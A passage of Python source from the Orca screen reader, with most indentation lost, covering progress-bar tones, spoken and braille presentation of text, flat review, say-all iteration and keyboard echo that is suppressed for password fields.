verbosity = _settingsManager.getSetting('progressBarVerbosity')
if verbosity == settings.PROGRESS_BAR_ALL:
makeAnnouncement = True
elif verbosity == settings.PROGRESS_BAR_WINDOW:
makeAnnouncement = self.utilities.isSameObject(
self.utilities.topLevelObject(obj),
self.utilities.activeWindow())
elif orca_state.locusOfFocus:
makeAnnouncement = self.utilities.isSameObject( \
obj.getApplication(),
orca_state.locusOfFocus.getApplication())
if makeAnnouncement:
currentTime = time.time()
# Check for defunct progress bars. Get rid of them if they
# are all defunct. Also find out which progress bar was
# the most recently updated.
#
defunctBars = 0
mostRecentUpdate = [obj, 0]
for key, value in list(self.lastProgressBarTime.items()):
if value > mostRecentUpdate[1]:
mostRecentUpdate = [key, value]
try:
isDefunct = \
key.getState().contains(pyatspi.STATE_DEFUNCT)
except:
isDefunct = True
if isDefunct:
defunctBars += 1
if defunctBars == len(self.lastProgressBarTime):
self.lastProgressBarTime = {}
self.lastProgressBarValue = {}
# If this progress bar is not already known, create initial
# values for it.
#
if obj not in self.lastProgressBarTime:
self.lastProgressBarTime[obj] = 0.0
if obj not in self.lastProgressBarValue:
self.lastProgressBarValue[obj] = None
lastProgressBarTime = self.lastProgressBarTime[obj]
lastProgressBarValue = self.lastProgressBarValue[obj]
value = obj.queryValue()
try:
if value.maximumValue == value.minimumValue:
# This is a busy indicator and not a real progress bar.
return
except:
return
                percentValue = int(((value.currentValue - value.minimumValue) /
                                    (value.maximumValue - value.minimumValue)) * 100.0)
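                # Present the update as a tone: the frequency rises with
                # the percentage complete, and the volume fades as the bar
                # approaches 100%.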
if _settingsManager.getSetting('progressBarBeep'):
                    # Compare against this bar's last value; the instance
                    # attribute is a dictionary, so comparing it with an
                    # integer would always differ.
                    if lastProgressBarValue != percentValue:
if percentValue < 7:
self.sound.source_set_property('freq', int((98 + percentValue * 4 * 1.35)))
self.sound._threadSound (0.075)
else:
self.sound.source_set_property('freq', int(19 * percentValue * 1.15))
self.sound.source_set_property('volume', 1 - (percentValue / 130))
if percentValue >= 99:
self.sound._threadSound (1)
else:
self.sound._threadSound (0.075)
if _settingsManager.getSetting('progressBarSpeak'):
if (currentTime - lastProgressBarTime) > \
_settingsManager.getSetting('progressBarUpdateInterval') \
or (percentValue == 100):
if lastProgressBarValue != percentValue:
utterances = []
# There may be cases when more than one progress
# bar is updating at the same time in a window.
# If this is the case, then speak the index of this
# progress bar in the dictionary of known progress
# bars, as well as the value. But only speak the
# index if this progress bar was not the most
# recently updated to prevent chattiness.
if len(self.lastProgressBarTime) > 1:
index = 0
for key in list(self.lastProgressBarTime.keys()):
if key == obj and key != mostRecentUpdate[0]:
label = messages.PROGRESS_BAR_NUMBER % (index + 1)
utterances.append(label)
else:
index += 1
utterances.extend(self.speechGenerator.generateSpeech(
obj, alreadyFocused=True))
speech.speak(utterances)
self.lastProgressBarTime[obj] = currentTime
if lastProgressBarValue != percentValue:
self.lastProgressBarValue[obj] = percentValue
def presentToolTip(self, obj):
"""
Speaks the tooltip for the current object of interest.
"""
# The tooltip is generally the accessible description. If
# the description is not set, present the text that is
# spoken when the object receives keyboard focus.
#
speechResult = brailleResult = None
text = ""
if obj.description:
speechResult = brailleResult = obj.description
else:
speechResult = self.whereAmI.getWhereAmI(obj, True)
if speechResult:
brailleResult = speechResult[0]
debug.println(debug.LEVEL_FINEST,
"presentToolTip: text='%s'" % speechResult)
if speechResult:
speech.speak(speechResult)
if brailleResult:
self.displayBrailleMessage(brailleResult)
def sayCharacter(self, obj):
"""Speak the character at the caret.
Arguments:
- obj: an Accessible object that implements the AccessibleText
interface
"""
text = obj.queryText()
offset = text.caretOffset
# If we have selected text and the last event was a move to the
# right, then speak the character to the left of where the text
# caret is (i.e. the selected character).
#
eventString, mods = self.utilities.lastKeyAndModifiers()
if (mods & keybindings.SHIFT_MODIFIER_MASK) \
and eventString in ["Right", "Down"]:
offset -= 1
character, startOffset, endOffset = \
text.getTextAtOffset(offset, pyatspi.TEXT_BOUNDARY_CHAR)
if not character or character == '\r':
character = "\n"
if self.utilities.linkIndex(obj, offset) >= 0:
voice = self.voices[settings.HYPERLINK_VOICE]
elif character.isupper():
voice = self.voices[settings.UPPERCASE_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
speakBlankLines = _settingsManager.getSetting('speakBlankLines')
debug.println(debug.LEVEL_FINEST, \
"sayCharacter: char=<%s>, startOffset=%d, " % \
(character, startOffset))
debug.println(debug.LEVEL_FINEST, \
"caretOffset=%d, endOffset=%d, speakBlankLines=%s" % \
(offset, endOffset, speakBlankLines))
if character == "\n":
line = text.getTextAtOffset(max(0, offset),
pyatspi.TEXT_BOUNDARY_LINE_START)
if not line[0] or line[0] == "\n":
# This is a blank line. Announce it if the user requested
# that blank lines be spoken.
if speakBlankLines:
self.speakMessage(messages.BLANK, interrupt=False)
return
if character in ["\n", "\r\n"]:
# This is a blank line. Announce it if the user requested
# that blank lines be spoken.
if speakBlankLines:
self.speakMessage(messages.BLANK, interrupt=False)
return
else:
self.speakMisspelledIndicator(obj, offset)
self.speakCharacter(character)
def sayLine(self, obj):
"""Speaks the line of an AccessibleText object that contains the
caret, unless the line is empty in which case it's ignored.
Arguments:
- obj: an Accessible object that implements the AccessibleText
interface
"""
# Get the AccessibleText interface of the provided object
#
[line, caretOffset, startOffset] = self.getTextLineAtCaret(obj)
debug.println(debug.LEVEL_FINEST, \
"sayLine: line=<%s>, len=%d, start=%d, " % \
(line, len(line), startOffset))
debug.println(debug.LEVEL_FINEST, \
"caret=%d, speakBlankLines=%s" % \
(caretOffset, _settingsManager.getSetting('speakBlankLines')))
if len(line) and line != "\n":
if line.isupper():
voice = self.voices[settings.UPPERCASE_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
result = \
self.speechGenerator.generateTextIndentation(obj, line=line)
if result:
self.speakMessage(result[0])
line = self.utilities.adjustForLinks(obj, line, startOffset)
line = self.utilities.adjustForRepeats(line)
speech.speak(line, voice)
else:
# Speak blank line if appropriate.
#
self.sayCharacter(obj)
def sayPhrase(self, obj, startOffset, endOffset):
"""Speaks the text of an Accessible object between the start and
end offsets, unless the phrase is empty in which case it's ignored.
Arguments:
- obj: an Accessible object that implements the AccessibleText
interface
- startOffset: the start text offset.
- endOffset: the end text offset.
"""
phrase = self.utilities.expandEOCs(obj, startOffset, endOffset)
if not phrase:
return
if len(phrase) > 1 or phrase.isalnum():
if phrase.isupper():
voice = self.voices[settings.UPPERCASE_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
phrase = self.utilities.adjustForRepeats(phrase)
speech.speak(phrase, voice)
else:
self.sayCharacter(obj)
def sayWord(self, obj):
"""Speaks the word at the caret.
Arguments:
- obj: an Accessible object that implements the AccessibleText
interface
"""
text = obj.queryText()
offset = text.caretOffset
lastKey, mods = self.utilities.lastKeyAndModifiers()
lastWord = self._lastWord
[word, startOffset, endOffset] = \
text.getTextAtOffset(offset,
pyatspi.TEXT_BOUNDARY_WORD_START)
if not word:
self.sayCharacter(obj)
return
# Speak a newline if a control-right-arrow or control-left-arrow
# was used to cross a line boundary. Handling is different for
# the two keys since control-right-arrow places the cursor after
# the last character in a word, but control-left-arrow places
# the cursor at the beginning of a word.
#
if lastKey == "Right" and len(lastWord) > 0:
lastChar = lastWord[len(lastWord) - 1]
if lastChar == "\n" and lastWord != word:
self.speakCharacter("\n")
if lastKey == "Left" and len(word) > 0:
lastChar = word[len(word) - 1]
if lastChar == "\n" and lastWord != word:
self.speakCharacter("\n")
if self.utilities.linkIndex(obj, offset) >= 0:
voice = self.voices[settings.HYPERLINK_VOICE]
elif word.isupper():
voice = self.voices[settings.UPPERCASE_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
self.speakMisspelledIndicator(obj, startOffset)
word = self.utilities.adjustForRepeats(word)
self._lastWord = word
speech.speak(word, voice)
def presentObject(self, obj, offset=0):
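        """Updates braille and speaks the given object."""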
self.updateBraille(obj)
utterances = self.speechGenerator.generateSpeech(obj)
        speech.speak(utterances)
def stopSpeechOnActiveDescendantChanged(self, event):
"""Whether or not speech should be stopped prior to setting the
locusOfFocus in onActiveDescendantChanged.
Arguments:
- event: the Event
Returns True if speech should be stopped; False otherwise.
"""
if not event.any_data:
return True
# In an object which manages its descendants, the
# 'descendants' may really be a single object which changes
# its name. If the name-change occurs followed by the active
# descendant changing (to the same object) we won't present
# the locusOfFocus because it hasn't changed. Thus we need to
        # be sure not to cut off the presentation of the name-change
# event.
if orca_state.locusOfFocus == event.any_data:
names = self.pointOfReference.get('names', {})
oldName = names.get(hash(orca_state.locusOfFocus), '')
if not oldName or event.any_data.name == oldName:
return False
if event.source == orca_state.locusOfFocus == event.any_data.parent:
return False
return True
def getFlatReviewContext(self):
"""Returns the flat review context, creating one if necessary."""
if not self.flatReviewContext:
self.flatReviewContext = self.flatReviewContextClass(self)
self.justEnteredFlatReviewMode = True
# Remember where the cursor currently was
# when the user was in focus tracking mode. We'll try to
# keep the position the same as we move to characters above
# and below us.
#
self.targetCursorCell = self.getBrailleCursorCell()
return self.flatReviewContext
def updateBrailleReview(self, targetCursorCell=0):
"""Obtains the braille regions for the current flat review line
and displays them on the braille display. If the targetCursorCell
        is non-0, then an attempt will be made to position the review cursor
at that cell. Otherwise, we will pan in display-sized increments
to show the review cursor."""
if not _settingsManager.getSetting('enableBraille') \
and not _settingsManager.getSetting('enableBrailleMonitor'):
debug.println(debug.LEVEL_INFO, "BRAILLE: update review disabled")
return
context = self.getFlatReviewContext()
[regions, regionWithFocus] = context.getCurrentBrailleRegions()
if not regions:
regions = []
regionWithFocus = None
line = self.getNewBrailleLine()
self.addBrailleRegionsToLine(regions, line)
braille.setLines([line])
self.setBrailleFocus(regionWithFocus, False)
if regionWithFocus:
self.panBrailleToOffset(regionWithFocus.brailleOffset \
+ regionWithFocus.cursorOffset)
if self.justEnteredFlatReviewMode:
self.refreshBraille(True, self.targetCursorCell)
self.justEnteredFlatReviewMode = False
else:
self.refreshBraille(True, targetCursorCell)
def _setFlatReviewContextToBeginningOfBrailleDisplay(self):
"""Sets the character of interest to be the first character showing
at the beginning of the braille display."""
context = self.getFlatReviewContext()
[regions, regionWithFocus] = context.getCurrentBrailleRegions()
for region in regions:
if ((region.brailleOffset + len(region.string)) \
> braille.viewport[0]) \
and (isinstance(region, braille.ReviewText) \
or isinstance(region, braille.ReviewComponent)):
position = max(region.brailleOffset, braille.viewport[0])
offset = position - region.brailleOffset
self.targetCursorCell = region.brailleOffset \
- braille.viewport[0]
[word, charOffset] = region.zone.getWordAtOffset(offset)
if word:
self.flatReviewContext.setCurrent(
word.zone.line.index,
word.zone.index,
word.index,
charOffset)
else:
self.flatReviewContext.setCurrent(
region.zone.line.index,
region.zone.index,
0, # word index
0) # character index
break
def find(self, query=None):
"""Searches for the specified query. If no query is specified,
it searches for the query specified in the Orca Find dialog.
Arguments:
- query: The search query to find.
"""
if not query:
query = find.getLastQuery()
if query:
context = self.getFlatReviewContext()
location = query.findQuery(context, self.justEnteredFlatReviewMode)
if not location:
self.presentMessage(messages.STRING_NOT_FOUND)
else:
context.setCurrent(location.lineIndex, location.zoneIndex, \
location.wordIndex, location.charIndex)
self.reviewCurrentItem(None)
self.targetCursorCell = self.getBrailleCursorCell()
def getUnicodeCurrencySymbols(self):
"""Return a list of the unicode currency symbols, populating the list
if this is the first time that this routine has been called.
Returns a list of unicode currency symbols.
"""
if not self._unicodeCurrencySymbols:
self._unicodeCurrencySymbols = [ \
'\u0024', # dollar sign
'\u00A2', # cent sign
'\u00A3', # pound sign
'\u00A4', # currency sign
'\u00A5', # yen sign
'\u0192', # latin small letter f with hook
'\u060B', # afghani sign
'\u09F2', # bengali rupee mark
'\u09F3', # bengali rupee sign
'\u0AF1', # gujarati rupee sign
'\u0BF9', # tamil rupee sign
'\u0E3F', # thai currency symbol baht
'\u17DB', # khmer currency symbol riel
'\u2133', # script capital m
'\u5143', # cjk unified ideograph-5143
'\u5186', # cjk unified ideograph-5186
'\u5706', # cjk unified ideograph-5706
'\u5713', # cjk unified ideograph-5713
'\uFDFC', # rial sign
]
# Add 20A0 (EURO-CURRENCY SIGN) to 20B5 (CEDI SIGN)
#
for ordChar in range(ord('\u20A0'), ord('\u20B5') + 1):
self._unicodeCurrencySymbols.append(chr(ordChar))
return self._unicodeCurrencySymbols
def speakMisspeltWord(self, allTokens, badWord):
"""Called by various spell checking routine to speak the misspelt word,
plus the context that it is being used in.
Arguments:
- allTokens: a list of all the words.
- badWord: the misspelt word.
"""
# Create an utterance to speak consisting of the misspelt
        # word plus the context where it is used (up to five words
# to either side of it).
#
for i in range(0, len(allTokens)):
if allTokens[i].startswith(badWord):
minIndex = i - 5
if minIndex < 0:
minIndex = 0
maxIndex = i + 5
if maxIndex > (len(allTokens) - 1):
maxIndex = len(allTokens) - 1
utterances = [messages.MISSPELLED_WORD % badWord]
contextPhrase = " ".join(allTokens[minIndex:maxIndex+1])
utterances.append(messages.MISSPELLED_WORD_CONTEXT % contextPhrase)
# Turn the list of utterances into a string.
text = " ".join(utterances)
speech.speak(text)
def textLines(self, obj, offset=None):
"""Creates a generator that can be used to iterate over each line
of a text object, starting at the caret offset.
Arguments:
- obj: an Accessible that has a text specialization
Returns an iterator that produces elements of the form:
[SayAllContext, acss], where SayAllContext has the text to be
spoken and acss is an ACSS instance for speaking the text.
"""
self._sayAllIsInterrupted = False
try:
text = obj.queryText()
except:
self._inSayAll = False
self._sayAllContexts = []
return
self._inSayAll = True
length = text.characterCount
        if offset is None:
offset = text.caretOffset
# Determine the correct "say all by" mode to use.
#
sayAllStyle = _settingsManager.getSetting('sayAllStyle')
if sayAllStyle == settings.SAYALL_STYLE_SENTENCE:
mode = pyatspi.TEXT_BOUNDARY_SENTENCE_START
elif sayAllStyle == settings.SAYALL_STYLE_LINE:
mode = pyatspi.TEXT_BOUNDARY_LINE_START
else:
mode = pyatspi.TEXT_BOUNDARY_LINE_START
# Get the next line of text to read
#
done = False
while not done:
lastEndOffset = -1
while offset < length:
[lineString, startOffset, endOffset] = text.getTextAtOffset(
offset, mode)
# Some applications that don't support sentence boundaries
# will provide the line boundary results instead; others
# will return nothing.
#
if not lineString:
mode = pyatspi.TEXT_BOUNDARY_LINE_START
[lineString, startOffset, endOffset] = \
text.getTextAtOffset(offset, mode)
# [[[WDW - HACK: well...gnome-terminal sometimes wants to
# give us outrageous values back from getTextAtOffset
# (see http://bugzilla.gnome.org/show_bug.cgi?id=343133),
# so we try to handle it.]]]
#
if startOffset < 0:
break
# [[[WDW - HACK: this is here because getTextAtOffset
# tends not to be implemented consistently across toolkits.
# Sometimes it behaves properly (i.e., giving us an endOffset
# that is the beginning of the next line), sometimes it
# doesn't (e.g., giving us an endOffset that is the end of
# the current line). So...we hack. The whole 'max' deal
# is to account for lines that might be a brazillion lines
# long.]]]
#
if endOffset == lastEndOffset:
offset = max(offset + 1, lastEndOffset + 1)
lastEndOffset = endOffset
continue
lastEndOffset = endOffset
offset = endOffset
lineString = \
self.utilities.adjustForLinks(obj, lineString, startOffset)
lineString = self.utilities.adjustForRepeats(lineString)
if lineString.isupper():
voice = settings.voices[settings.UPPERCASE_VOICE]
else:
voice = settings.voices[settings.DEFAULT_VOICE]
context = speechserver.SayAllContext(
obj, lineString, startOffset, endOffset)
self._sayAllContexts.append(context)
yield [context, voice]
moreLines = False
relations = obj.getRelationSet()
for relation in relations:
if relation.getRelationType() \
== pyatspi.RELATION_FLOWS_TO:
obj = relation.getTarget(0)
try:
text = obj.queryText()
except NotImplementedError:
return
length = text.characterCount
offset = 0
moreLines = True
break
if not moreLines:
done = True
self._inSayAll = False
self._sayAllContexts = []
def getTextLineAtCaret(self, obj, offset=None, startOffset=None, endOffset=None):
"""To-be-removed. Returns the string, caretOffset, startOffset."""
try:
text = obj.queryText()
except NotImplementedError:
return ["", 0, 0]
# The caret might be positioned at the very end of the text area.
# In these cases, calling text.getTextAtOffset on an offset that's
# not positioned to a character can yield unexpected results. In
# particular, we'll see the Gecko toolkit return a start and end
# offset of (0, 0), and we'll see other implementations, such as
# gedit, return reasonable results (i.e., gedit will give us the
# last line).
#
# In order to accommodate the differing behavior of different
# AT-SPI implementations, we'll make sure we give getTextAtOffset
# the offset of an actual character. Then, we'll do a little check
# to see if that character is a newline - if it is, we'll treat it
# as the line.
#
if text.caretOffset == text.characterCount:
caretOffset = max(0, text.caretOffset - 1)
character = text.getText(caretOffset, caretOffset + 1)
else:
caretOffset = text.caretOffset
character = None
if (text.caretOffset == text.characterCount) \
and (character == "\n"):
lineString = ""
startOffset = caretOffset
else:
# Get the line containing the caret. [[[TODO: HACK WDW - If
# there's only 1 character in the string, well, we get it. We
# do this because Gecko's implementation of getTextAtOffset
# is broken if there is just one character in the string.]]]
#
if (text.characterCount == 1):
lineString = text.getText(caretOffset, caretOffset + 1)
startOffset = caretOffset
else:
if caretOffset == -1:
caretOffset = text.characterCount
try:
[lineString, startOffset, endOffset] = text.getTextAtOffset(
caretOffset, pyatspi.TEXT_BOUNDARY_LINE_START)
except:
return ["", 0, 0]
# Sometimes we get the trailing line-feed-- remove it
# It is important that these are in order.
# In some circumstances we might get:
# word word\r\n
# so remove \n, and then remove \r.
# See bgo#619332.
#
lineString = lineString.rstrip('\n')
lineString = lineString.rstrip('\r')
return [lineString, text.caretOffset, startOffset]
def phoneticSpellCurrentItem(self, itemString):
"""Phonetically spell the current flat review word or line.
Arguments:
- itemString: the string to phonetically spell.
"""
for (charIndex, character) in enumerate(itemString):
if character.isupper():
voice = settings.voices[settings.UPPERCASE_VOICE]
character = character.lower()
else:
voice = settings.voices[settings.DEFAULT_VOICE]
phoneticString = phonnames.getPhoneticName(character)
speech.speak(phoneticString, voice)
def _saveLastCursorPosition(self, obj, caretOffset):
"""Save away the current text cursor position for next time.
Arguments:
- obj: the current accessible
- caretOffset: the cursor position within this object
"""
self.pointOfReference["lastCursorPosition"] = [obj, caretOffset]
def _getCtrlShiftSelectionsStrings(self):
return [messages.PARAGRAPH_SELECTED_DOWN,
messages.PARAGRAPH_UNSELECTED_DOWN,
messages.PARAGRAPH_SELECTED_UP,
messages.PARAGRAPH_UNSELECTED_UP]
def _speakTextSelectionState(self, nSelections):
"""Hacky method to speak special cases without any valid sanity
checking. It is not long for this world. Do not call it."""
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return False
eventStr, mods = self.utilities.lastKeyAndModifiers()
isControlKey = mods & keybindings.CTRL_MODIFIER_MASK
isShiftKey = mods & keybindings.SHIFT_MODIFIER_MASK
selectedText = nSelections > 0
line = None
if (eventStr == "Page_Down") and isShiftKey and isControlKey:
line = messages.LINE_SELECTED_RIGHT
elif (eventStr == "Page_Up") and isShiftKey and isControlKey:
line = messages.LINE_SELECTED_LEFT
elif (eventStr == "Page_Down") and isShiftKey and not isControlKey:
if selectedText:
line = messages.PAGE_SELECTED_DOWN
else:
line = messages.PAGE_UNSELECTED_DOWN
elif (eventStr == "Page_Up") and isShiftKey and not isControlKey:
if selectedText:
line = messages.PAGE_SELECTED_UP
else:
line = messages.PAGE_UNSELECTED_UP
elif (eventStr == "Down") and isShiftKey and isControlKey:
strings = self._getCtrlShiftSelectionsStrings()
if selectedText:
line = strings[0]
else:
line = strings[1]
elif (eventStr == "Up") and isShiftKey and isControlKey:
strings = self._getCtrlShiftSelectionsStrings()
if selectedText:
line = strings[2]
else:
line = strings[3]
elif (eventStr == "Home") and isShiftKey and isControlKey:
if selectedText:
line = messages.DOCUMENT_SELECTED_UP
else:
line = messages.DOCUMENT_UNSELECTED_UP
elif (eventStr == "End") and isShiftKey and isControlKey:
if selectedText:
line = messages.DOCUMENT_SELECTED_DOWN
else:
line = messages.DOCUMENT_UNSELECTED_DOWN
elif (eventStr == "A") and isControlKey and selectedText:
line = messages.DOCUMENT_SELECTED_ALL
if line:
speech.speak(line, None, False)
return True
return False
def systemBeep(self):
"""Rings the system bell. This is really a hack. Ideally, we want
a method that will present an earcon (any sound designated for the
purpose of representing an error, event, etc.)
"""
print("\a")
def speakWordUnderMouse(self, acc):
"""Determine if the speak-word-under-mouse capability applies to
the given accessible.
Arguments:
- acc: Accessible to test.
Returns True if this accessible should provide the single word.
"""
return acc and acc.getState().contains(pyatspi.STATE_EDITABLE)
def speakMisspelledIndicator(self, obj, offset):
"""Speaks an announcement indicating that a given word is misspelled.
Arguments:
- obj: An accessible which implements the accessible text interface.
- offset: Offset in the accessible's text for which to retrieve the
attributes.
"""
verbosity = _settingsManager.getSetting('speechVerbosityLevel')
if verbosity == settings.VERBOSITY_LEVEL_VERBOSE:
try:
text = obj.queryText()
except:
return
# If we're on whitespace, we cannot be on a misspelled word.
#
charAndOffsets = \
text.getTextAtOffset(offset, pyatspi.TEXT_BOUNDARY_CHAR)
if not charAndOffsets[0].strip() \
or self.utilities.isWordDelimiter(charAndOffsets[0]):
self._lastWordCheckedForSpelling = charAndOffsets[0]
return
wordAndOffsets = \
text.getTextAtOffset(offset, pyatspi.TEXT_BOUNDARY_WORD_START)
if self.utilities.isWordMisspelled(obj, offset) \
and wordAndOffsets[0] != self._lastWordCheckedForSpelling:
self.speakMessage(messages.MISSPELLED)
# Store this word so that we do not continue to present the
# presence of the red squiggly as the user arrows amongst
# the characters.
#
self._lastWordCheckedForSpelling = wordAndOffsets[0]
############################################################################
# #
# Presentation methods #
# (scripts should not call methods in braille.py or speech.py directly) #
# #
############################################################################
def presentationInterrupt(self):
"""Convenience method to interrupt presentation of whatever is being
presented at the moment."""
speech.stop()
braille.killFlash()
def presentKeyboardEvent(self, event):
"""Convenience method to present the KeyboardEvent event. Returns True
if we fully present the event; False otherwise."""
if not event.isPressedKey():
self._sayAllIsInterrupted = False
if not orca_state.learnModeEnabled:
if not event.shouldEcho or event.isOrcaModified():
return False
try:
role = orca_state.locusOfFocus.getRole()
except:
return False
if role == pyatspi.ROLE_PASSWORD_TEXT:
return False
# Worst. Hack. EVER. We have no reliable way of knowing a password is
# being entered into a terminal -- other than the fact that the text
# typed ain't there. As a result, we have to do special things when
# not in special modes. :( See bgo 668025.
if role == pyatspi.ROLE_TERMINAL:
if not event.isPressedKey():
try:
text = orca_state.locusOfFocus.queryText()
o = text.caretOffset
string = text.getText(o-1, o)
except:
pass
else:
if event.event_string not in [string, 'space']:
return False
elif not (orca_state.learnModeEnabled or event.isLockingKey()):
return False
elif not event.isPressedKey():
return False
debug.println(debug.LEVEL_FINEST,
"Script.presentKeyboardEvent: %s" % event.event_string)
braille.displayKeyEvent(event)
orcaModifierPressed = event.isOrcaModifier() and event.isPressedKey()
if event.isCharacterEchoable() and not orcaModifierPressed:
return False
if orca_state.learnModeEnabled:
if event.isPrintableKey() and event.getClickCount() == 2:
self.phoneticSpellCurrentItem(event.event_string)
return True
speech.speakKeyEvent(event)
return True
def presentMessage(self, fullMessage, briefMessage=None, voice=None):
"""Convenience method to speak a message and 'flash' it in braille.
Arguments:
- fullMessage: This can be a string or a list. This will be presented
as the message for users whose flash or message verbosity level is
verbose.
- briefMessage: This can be a string or a list. This will be presented
as the message for users whose flash or message verbosity level is
brief. Note that providing no briefMessage will result in the full
message being used for either. Callers wishing to present nothing as
the briefMessage should set briefMessage to an empty string.
- voice: The voice to use when speaking this message. By default, the
"system" voice will be used.
"""
if not fullMessage:
return
if briefMessage is None:
briefMessage = fullMessage
if _settingsManager.getSetting('enableSpeech'):
currentCapStyle = _settingsManager.getSetting('capitalizationStyle')
_settingsManager.setSetting(
'capitalizationStyle', settings.CAPITALIZATION_STYLE_NONE)
speech.updateCapitalizationStyle()
if _settingsManager.getSetting('messageVerbosityLevel') \
== settings.VERBOSITY_LEVEL_BRIEF:
message = briefMessage
else:
message = fullMessage
if message:
voice = voice or self.voices.get(settings.SYSTEM_VOICE)
speech.speak(message, voice)
_settingsManager.setSetting('capitalizationStyle', currentCapStyle)
speech.updateCapitalizationStyle()
if (_settingsManager.getSetting('enableBraille') \
or _settingsManager.getSetting('enableBrailleMonitor')) \
and _settingsManager.getSetting('enableFlashMessages'):
if _settingsManager.getSetting('flashVerbosityLevel') \
== settings.VERBOSITY_LEVEL_BRIEF:
message = briefMessage
else:
message = fullMessage
if not message:
return
if isinstance(message[0], list):
message = message[0]
if isinstance(message, list):
message = [i for i in message if isinstance(i, str)]
message = " ".join(message)
if _settingsManager.getSetting('flashIsPersistent'):
duration = -1
else:
duration = _settingsManager.getSetting('brailleFlashTime')
braille.displayMessage(message, flashTime=duration)
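# Illustrative usage sketch (not from the original source; 'script' stands
# for any Script instance): present a verbose message with a shorter variant
# for users whose verbosity level is brief.
#
#     script.presentMessage("Leaving table.")              # same full and brief
#     script.presentMessage("Table with 3 rows", "table")  # full vs. brief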
@staticmethod
def addBrailleRegionToLine(region, line):
"""Adds the braille region to the line.
Arguments:
- region: a braille.Region (e.g. what is returned by the braille
generator's generateBraille() method.
- line: a braille.Line
"""
line.addRegion(region)
@staticmethod
def addBrailleRegionsToLine(regions, line):
"""Adds the braille region to the line.
Arguments:
- regions: a series of braille.Region instances (a single instance
being what is returned by the braille generator's generateBraille()
method.
- line: a braille.Line
"""
line.addRegions(regions)
@staticmethod
def addToLineAsBrailleRegion(string, line):
"""Creates a Braille Region out of string and adds it to the line.
Arguments:
- string: the string to be displayed
- line: a braille.Line
"""
line.addRegion(braille.Region(string))
@staticmethod
def brailleRegionsFromStrings(strings):
"""Creates a list of braille regions from the list of strings.
Arguments:
- strings: a list of strings from which to create the list of
braille Region instances
Returns the list of braille Region instances
"""
brailleRegions = []
for string in strings:
brailleRegions.append(braille.Region(string))
return brailleRegions
@staticmethod
def clearBraille():
"""Clears the logical structure, but keeps the Braille display as is
(until a refresh operation)."""
braille.clear()
@staticmethod
def displayBrailleMessage(message, cursor=-1, flashTime=0):
"""Displays a single line, setting the cursor to the given position,
ensuring that the cursor is in view.
Arguments:
- message: the string to display
- cursor: the 0-based cursor position, where -1 (default) means no
cursor
- flashTime: if non-0, the number of milliseconds to display the
regions before reverting back to what was there before. A 0 means
to not do any flashing. A negative number means to display the
message until some other message comes along or the user presses
a cursor routing key.
"""
if not _settingsManager.getSetting('enableBraille') \
and not _settingsManager.getSetting('enableBrailleMonitor'):
debug.println(debug.LEVEL_INFO, "BRAILLE: display message disabled")
return
braille.displayMessage(message, cursor, flashTime)
@staticmethod
def displayBrailleRegions(regionInfo, flashTime=0):
"""Displays a list of regions on a single line, setting focus to the
specified region. The regionInfo parameter is something that is
typically returned by a call to braille_generator.generateBraille.
Arguments:
- regionInfo: a list where the first element is a list of regions
to display and the second element is the region with focus (must
be in the list from element 0)
- flashTime: if non-0, the number of milliseconds to display the
regions before reverting back to what was there before. A 0 means
to not do any flashing. A negative number means to display the
message until some other message comes along or the user presses
a cursor routing key.
"""
if not _settingsManager.getSetting('enableBraille') \
and not _settingsManager.getSetting('enableBrailleMonitor'):
debug.println(debug.LEVEL_INFO, "BRAILLE: display regions disabled")
return
braille.displayRegions(regionInfo, flashTime)
def displayBrailleForObject(self, obj):
"""Convenience method for scripts combining the call to the braille
generator for the script with the call to displayBrailleRegions.
Arguments:
- obj: the accessible object to display in braille
"""
regions = self.brailleGenerator.generateBraille(obj)
self.displayBrailleRegions(regions)
@staticmethod
def getBrailleCaretContext(event):
"""Gets the accesible and caret offset associated with the given
event. The event should have a BrlAPI event that contains an
argument value that corresponds to a cell on the display.
Arguments:
- event: an instance of input_event.BrailleEvent. event.event is
the dictionary form of the expanded BrlAPI event.
"""
return braille.getCaretContext(event)
@staticmethod
def getBrailleCursorCell():
"""Returns the value of position of the braille cell which has the
cursor. A value of 0 means no cell has the cursor."""
return braille.cursorCell
@staticmethod
def getNewBrailleLine(clearBraille=False, addLine=False):
"""Creates a new braille Line.
Arguments:
- clearBraille: Whether the display should be cleared.
- addLine: Whether the line should be added to the logical display
for painting.
Returns the new Line.
"""
if clearBraille:
braille.clear()
line = braille.Line()
if addLine:
braille.addLine(line)
return line
@staticmethod
def getNewBrailleComponent(accessible, string, cursorOffset=0,
indicator='', expandOnCursor=False):
"""Creates a new braille Component.
Arguments:
- accessible: the accessible associated with this region
- string: the string to be displayed
- cursorOffset: a 0-based index saying where to draw the cursor
for this Region if it gets focus
Returns the new Component.
"""
return braille.Component(accessible, string, cursorOffset,
indicator, expandOnCursor)
@staticmethod
def getNewBrailleRegion(string, cursorOffset=0, expandOnCursor=False):
"""Creates a new braille Region.
Arguments:
- string: the string to be displayed
- cursorOffset: a 0-based index saying where to draw the cursor
for this Region if it gets focus
Returns the new Region.
"""
return braille.Region(string, cursorOffset, expandOnCursor)
@staticmethod
def getNewBrailleText(accessible, label="", eol="", startOffset=None,
endOffset=None):
"""Creates a new braille Text region.
Arguments:
- accessible: the accessible associated with this region and which
implements AtkText
- label: an optional label to display
- eol: the endOfLine indicator
Returns the new Text region.
"""
return braille.Text(accessible, label, eol, startOffset, endOffset)
@staticmethod
def isBrailleBeginningShowing():
"""If True, the beginning of the line is showing on the braille
display."""
return braille.beginningIsShowing
@staticmethod
def isBrailleEndShowing():
"""If True, the end of the line is showing on the braille display."""
return braille.endIsShowing
@staticmethod
def panBrailleInDirection(panAmount=0, panToLeft=True):
"""Pans the display to the left, limiting the pan to the beginning
of the line being displayed.
Arguments:
- panAmount: the amount to pan. A value of 0 means the entire
width of the physical display.
- panToLeft: if True, pan to the left; otherwise to the right
Returns True if a pan actually happened.
"""
if panToLeft:
return braille.panLeft(panAmount)
else:
return braille.panRight(panAmount)
@staticmethod
def panBrailleToOffset(offset):
"""Automatically pan left or right to make sure the current offset
is showing."""
braille.panToOffset(offset)
@staticmethod
def presentItemsInBraille(items):
"""Method to braille a list of items. Scripts should call this
method rather than handling the creation and displaying of a
braille line directly.
Arguments:
- items: a list of strings to be presented
"""
line = braille.getShowingLine()
